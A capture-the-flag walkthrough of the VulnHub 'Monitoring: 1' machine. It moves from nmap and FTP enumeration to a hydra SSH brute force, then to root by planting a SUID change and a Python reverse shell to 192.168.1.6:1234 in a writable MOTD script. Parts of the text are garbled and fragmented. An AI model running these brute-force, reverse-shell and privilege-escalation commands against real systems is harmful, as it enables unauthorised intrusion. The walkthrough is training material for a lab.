# VulnHub-Monitoring: 1

# **Target IP Address**

nmap -T5 192.168.1.1/24

IP Address: 192.168.1.19

# **Scanning & Enumeration**

#### nmap

nmap -A -O -p- -T5 -oN nmap.txt 192.168.1.19

#### PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3

Lftp-anon: Anonymous FTP login allowed (FTP code 230)

| ftp-syst: | STAT:

| FTP server status:

| Connected to ::ffff:192.168.1.6

| Logged in as ftp

| TYPE: ASCII

| No session bandwidth limit

| Session timeout in seconds is 300

| Control connection is plain text

| Data connections will be plain text

| At session startup, client count was 3

| vsFTPd 3.0.3 - secure, fast, stable

|End of status

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

Issh-hostkey:

| 2048 95:84:46:ae:47:21:d1:73:7d:2f:0a:66:87:98:af:d3 (RSA)

| 256 af:79:86:77:00:59:3e:ee:cf:6e:bb:bc:cb:ad:96:cc (ECDSA)

/ 256 9d:4d:2a:a1:65:d4:f2:bd:5b:25:22:ec:bc:6f:66:97 (ED25519)

80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

Lhttp-server-header: Apache/2.4.29 (Ubuntu)

\_http-title: OneSchool — Website by Colorlib

MAC Address: 08:00:27:09:6B:FC (Oracle VirtualBox virtual NIC)

Aggressive OS guesses: Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 3.4 - 3.10 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Synology DiskStation Manager 5.2-5644

(94%), Netgear RAIDiator 4.2.28 (94%), Linux 2.6.32 - 2.6.35 (94%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux\_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.1.19

```
| Improved | Improved
```

### FTP Allows Anonymous Login

```
ftp> ls -la 200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 2 1000 1000 4096 Aug 22 17:39 .
drwxrwxr-x 2 1000 1000 4096 Aug 22 17:39 ..
-rw-r--r-- 1 0 0 54 Aug 22 17:39 .bash_history
226 Directory send OK.
```

Found .bash\_history

```
get .bash_history
```

```
[m3rc@brut3-g33579 KB-VULN]$ cat .bash_history
exit
ls
cd /etc/update-motd.d/
ls
nano 00-header
exit
[m3rc@brut3-g33579 KB-VULN]$
```

• Directory traversal is not possible

### Dirbuster

## Report produced on Tue Sep 29 15:18:24 IST 2020

# http://192.168.1.19:80

Directories found during testing:

Dirs found with a 200 response:

```
/images/
/
/js/
/css/
/css/bootstrap/
/fonts/
/fonts/flaticon/
/fonts/flaticon/font/
/fonts/flaticon/license/
```

Dirs found with a 403 response:

/icons/ /icons/small/ /server-status/

### Files found during testing:

#### Files found with a 200 responce:

/images/blob\_1.svg

/index.html

/images/blob\_2.svg

/course-single.html

/images/undraw\_teacher.svg

/images/undraw\_teaching.svg

/images/undraw\_youtube\_tutorial.svg

/js/aos.js

/js/bootstrap-datepicker.min.js

/js/jquery-3.3.1.min.js

/js/jquery-migrate-3.0.1.min.js

/js/bootstrap.min.js

/js/jquery-ui.js

/css/aos.css

/js/owl.carousel.min.js

/js/popper.min.js

/css/bootstrap-datepicker.css

/js/jquery.easing.1.3.js

/js/jquery.countdown.min.js

/css/owl.theme.default.min.css

/css/magnific-popup.css

/css/jquery-ui.css

/js/typed.js

/js/jquery.fancybox.min.js

/css/owl.carousel.min.css

/css/bootstrap.min.css

/css/mediaelementplayer.css

/js/jquery.sticky.js

/js/main.js

/js/jquery.stellar.min.js

/js/jquery.magnific-popup.min.js

/js/slick.min.js

/js/mediaelement-and-player.min.js

/css/bootstrap.min.css.map

/css/jquery.fancybox.min.css

/css/style.css
/css/bootstrap/bootstrap-grid.css
/css/bootstrap/bootstrap-reboot.css
/css/bootstrap/bootstrap.css
/fonts/flaticon/backup.txt
/fonts/flaticon/font/Flaticon.eot
/fonts/flaticon/license/license.pdf
/fonts/flaticon/font/Flaticon.svg
/fonts/flaticon/font/Flaticon.scss
/fonts/flaticon/font/Flaticon.woff
/fonts/flaticon/font/Flaticon.css
/fonts/flaticon/font/Flaticon.woff2
/fonts/flaticon/font/Flaticon.html

• No interesting results

### http://192.168.1.19

• Found a Username in the source code

### sysadmin

### SSH (brute force)

### Username -> sysadmin

hydra -l sysadmin -P /usr/share/wordlists/ssh\_passwords.txt 192.168.1.19

```
[DATA] attacking ssh://192.168.1.19:22/
[STATUS] 14442.00 tries/min, 14442 tries in 00:01h, 66345 to do in 00:05h, 64 active
[STATUS] 5180.00 tries/min, 15540 tries in 00:03h, 65247 to do in 00:13h, 64 active
[STATUS] 2485.71 tries/min, 17400 tries in 00:07h, 63387 to do in 00:26h, 64 active
[STATUS] 1448.47 tries/min, 17400 tries in 00:15h, 59060 to do in 00:41h, 64 active
[22][ssh] host: 192.168.1.18 login: sysadmin password: password1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 38 final worker threads did not complete until end.
[ERROR] 38 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-29 17:39:06
[m3rc@brut3-g33579 KB-VULN]$
```

### Password -> password1

• SSH login

# **User Flag**

```
sysadmin@kb-server:~$ ls -la
total 40
drwxr-xr-x 5 sysadmin sysadmin 4096 Aug 22 18:04 .
                                4096 Aug 22 17:53 ..
                     root
-rw----- 1 sysadmin sysadmin 16 Aug 22 18:04 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx----- 2 sysadmin sysadmin 4096 Aug 22 17:02 .cache
drwxrwxr-x 2 sysadmin sysadmin 4096 Aug 22 17:39 ftp
drwx----- 3 sysadmin sysadmin 4096 Aug 22 17:02 .gnupg
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
                                   33 Aug 22 17:54 user.txt
-rw-r--r-- 1 root
                      root
sysadmin@kb-server:~$ cat user.txt
sysadmin@kb-server:~$
```

### **Enumerating for Privilege Escalation**

• Seeing if sysadmin can run anything as root

```
sudo -l
```

```
sysadmin@kb-server:~$ sudo -l [sudo] password for sysadmin:
Sorry, user sysadmin may not run sudo on kb-server.
sysadmin@kb-server:~$
```

Checking for SUID

```
find / -perm -4000 2>dev/null
```

```
sysadmin@kb-server:~$ find / -perm -4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/bin/fusermount
/bin/umount
/bin/ping
/bin/su
```

Nothing interesting found

Checking back on .bash\_history found in ftp

- 00-header can be written into by anyone.
- We can use it to change the permission of a command to gain root access

```
echo "sudo chmod u+s /usr/bin/find" >> /etc/update-motd.d/00-header
```

On logging in again, we can escalate privileges using find

2);p=subprocess.call(["/bin/sh","-i"]);'

```
sudo find . -exec /bin/sh \; -quit
```

```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.conn ect(("192.168.1.6",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),1);
```

```
sysadmin@kb-server:/etc/update-motd.d$ cat 00-header
#//bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland (kirkland@canonical.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\n\t\t\UKULCOME TO THE KB-SERVER\n"
python3 - c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((1 92.168.1.6,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call
([/bin/sh,-i];'
sysadmin@kb-server:/etc/update-motd.d$ [
```

#### Root Flag

```
bash-4.4# cd /root
bash-4.4# ls
flag.txt
bash-4.4# cat flag.txt
1
bash-4.4# [
```